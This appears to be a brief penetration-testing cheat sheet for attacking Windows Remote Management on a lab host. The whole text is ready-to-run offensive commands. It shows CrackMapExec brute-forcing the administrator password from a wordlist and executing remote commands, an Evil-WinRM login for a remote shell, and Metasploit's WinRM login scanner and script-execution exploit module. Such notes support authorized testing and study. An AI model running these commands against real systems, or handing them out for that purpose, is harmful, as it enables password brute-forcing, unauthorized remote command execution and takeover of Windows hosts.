WinRM Enumeration
CrackMapExec / NetExec
crackmapexec winrm 10.10.2.242 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
crackmapexec winrm 10.10.2.242 -u administrator -p haslo -x "whoami"
crackmapexec winrm 10.10.2.242 -u administrator -p haslo -x "systeminfo"
Evil-WinRM
evil-winrm.rb -u administrator -p 'haslo' -i 10.10.2.242
Metasploit
use auxiliary/scanner/winrm/winrm_login
use exploit/windows/winrm/winrm_script_exec
set FORCE_VBS true